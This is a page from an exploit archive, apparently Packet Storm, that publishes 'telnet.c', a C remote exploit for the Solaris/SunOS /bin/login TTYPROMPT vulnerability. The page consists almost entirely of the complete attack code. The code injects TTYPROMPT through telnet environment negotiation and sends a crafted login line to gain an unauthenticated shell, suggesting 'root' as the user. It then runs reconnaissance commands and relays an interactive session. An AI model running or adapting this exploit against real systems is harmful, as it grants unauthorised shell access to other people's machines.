what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

telnet.c

telnet.c
Posted Oct 4, 2002
Authored by Lion | Site cnhonker.com

SunOS 5.5, 5.5.1 and Solaris 2.6, 2.7, and 2.8 SPARC and SunOS 5.7 and 5.8 x86 /bin/login TTYPROMPT remote exploit.

tags | exploit, remote, x86
systems | solaris
SHA-256 | 6f38570fff5965430e3795883b29ecd89446facfe2854c27837e6d2ce22a4cc0

telnet.c

Change Mirror Download
/******************************************************************


Solaris 2.6, 7, and 8 /bin/login TTYPROMPT remote exploit.

Tested for:
SunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc
SunOS 5.7, 5.8 x86

Code by lion
lion@cnhonker.net

Welcome to HUC website http://www.cnhonker.com


******************************************************************/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/telnet.h>

#define BUFLEN 1024

char shellcode[]= "\x97\x97\x97\x97\x97\x97";

void usage(char *p)
{
printf("Usage: %s [-u user] [-p port] <-h host>\n\n", p);
printf(" -u: login username (default: bin), try \"root\" :)\n");
printf(" -p: port to use (default: 23)\n\n");

printf("\n");
exit(0);
}

void msg(char *msg)
{
perror(msg);
exit(errno);
}

u_int32_t get_ip(char *host)
{
struct hostent *hp;

if(!(hp = gethostbyname(host))){
fprintf(stderr, "cannot resolve %s\n", host);
return(0);
}
return(*(u_int32_t *)hp->h_addr_list[0]);
}

int get_socket(char *target, int port)
{
int sock;
u_int32_t ip;
struct sockaddr_in sin;

if(!(ip = get_ip(target)))
return(0);

bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = ip;

if(!(sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
msg("socket");
if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
msg("connect");
return(sock);
}

void send_wont(int sock, int option)
{
char buf[3], *ptr=buf;

*ptr++ = IAC;
*ptr++ = WONT;
*ptr++ = (unsigned char)option;
if(write(sock, buf, 3) < 0)
msg("write");
return;
}

void send_will(int sock, int option)
{
char buf[3], *ptr=buf;

*ptr++ = IAC;
*ptr++ = WILL;
*ptr++ = (unsigned char)option;
if(write(sock, buf, 3) < 0)
msg("write");
return;
}

void send_do(int sock, int option)
{
char buf[3], *ptr=buf;

*ptr++ = IAC;
*ptr++ = DO;
*ptr++ = (unsigned char)option;
if(write(sock, buf, 3) < 0)
msg("write");
return;
}

void send_env(int sock, char *name, char *value)
{
char buf[BUFLEN], *ptr = buf;

*ptr++ = IAC;
*ptr++ = SB;
*ptr++ = TELOPT_NEW_ENVIRON;
*ptr++ = TELQUAL_IS;
*ptr++ = NEW_ENV_VAR;
strncpy(ptr, name, BUFLEN-20);
ptr += strlen(ptr);
*ptr++ = NEW_ENV_VALUE;
strncpy(ptr, value, (&buf[BUFLEN-1] - ptr)-1);
ptr += strlen(ptr);
*ptr++ = IAC;
*ptr++ = SE;

if(write(sock, buf, (ptr - buf)) < 0)
msg("write");
return;
}

void do_negotiate(int sock)
{
send_wont(sock, TELOPT_TTYPE);
send_wont(sock, TELOPT_NAWS);
send_wont(sock, TELOPT_LFLOW);
send_wont(sock, TELOPT_LINEMODE);
send_wont(sock, TELOPT_XDISPLOC);
send_will(sock, TELOPT_LFLOW);
send_will(sock, TELOPT_LINEMODE);
send_wont(sock, TELOPT_OLD_ENVIRON);
send_will(sock, TELOPT_NEW_ENVIRON);
send_will(sock, TELOPT_BINARY);
send_env(sock, "TTYPROMPT", shellcode);
return;
}

void write_attack_buf(int sock, char *user)
{
char outbuf[128],*s_buf;
int i, j;

if(!(s_buf = (char *)calloc(BUFLEN*2, 1)))
msg("malloc");

strcpy(outbuf, user);
for(i = 0; i < 65; i++)
{
strcat(outbuf, " c");
}
strcat(outbuf, "\n");

printf("send to target:\n%s\n", outbuf);
if(write(sock, outbuf, strlen(outbuf)) < 0)
msg("write");



/* -- 2 reads for reading the garbage which screws up term -- */
if((j = read(sock, s_buf, BUFLEN)) < 0)
msg("read");

if((j = read(sock, s_buf, BUFLEN)) < 0)
msg("read");
free(s_buf);
return;
}

int main(int argc, char **argv)
{
int c, n, sockfd, port = 23;
char buf[2048], *shellstr="cd /; id; pwd; uname -a;\r\n";
char user[36], host[36];
fd_set rset;

printf("============================================================\n");
printf("Solaris 5.6 7 8 telnetd Remote exploit\n");
printf("Tested for:\nSunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc\nSunOS 5.7, 5.8 x86\n");
printf("Code by lion, Welcome to HUC website http://www.cnhonker.com\n\n");

if(argc <3) usage(argv[0]);
strcpy(user, "bin");
while((c = getopt(argc, argv, "h:u:p:")) != EOF){
switch(c){
case 'h':
strncpy(host, optarg, 36);
break;
case 'u':
strncpy(user,optarg, 36);
break;
case 'p':
port = atoi(optarg);
break;
}
}

if(!(sockfd = get_socket(host, port)))
exit(-1);

do_negotiate(sockfd);

n = read(sockfd, buf, sizeof(buf));

write_attack_buf(sockfd,user);

send_wont(sockfd, TELOPT_BINARY);

sleep(1);
read(sockfd, buf, sizeof(buf));

write(sockfd, shellstr, strlen(shellstr));
n = read(sockfd, buf, sizeof(buf));

FD_ZERO(&rset);
for(;;){
FD_SET(0, &rset);
FD_SET(sockfd, &rset);
if(select(sockfd+1, &rset, NULL, NULL, NULL) < 0)
msg("select");

if(FD_ISSET(sockfd, &rset)){
bzero(buf, sizeof(buf));
if((n = read(sockfd, buf, sizeof(buf))) < 0)
msg("read");
if(n == 0){
printf("EOF\n");
exit(0);
}
write(1, buf, n);
}

if(FD_ISSET(0, &rset)){
bzero(buf, sizeof(buf));
if((n = read(0, buf, sizeof(buf))) < 0)
msg("read");
if(n == 0)
exit(0);
write(sockfd, buf, n);
}
}
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close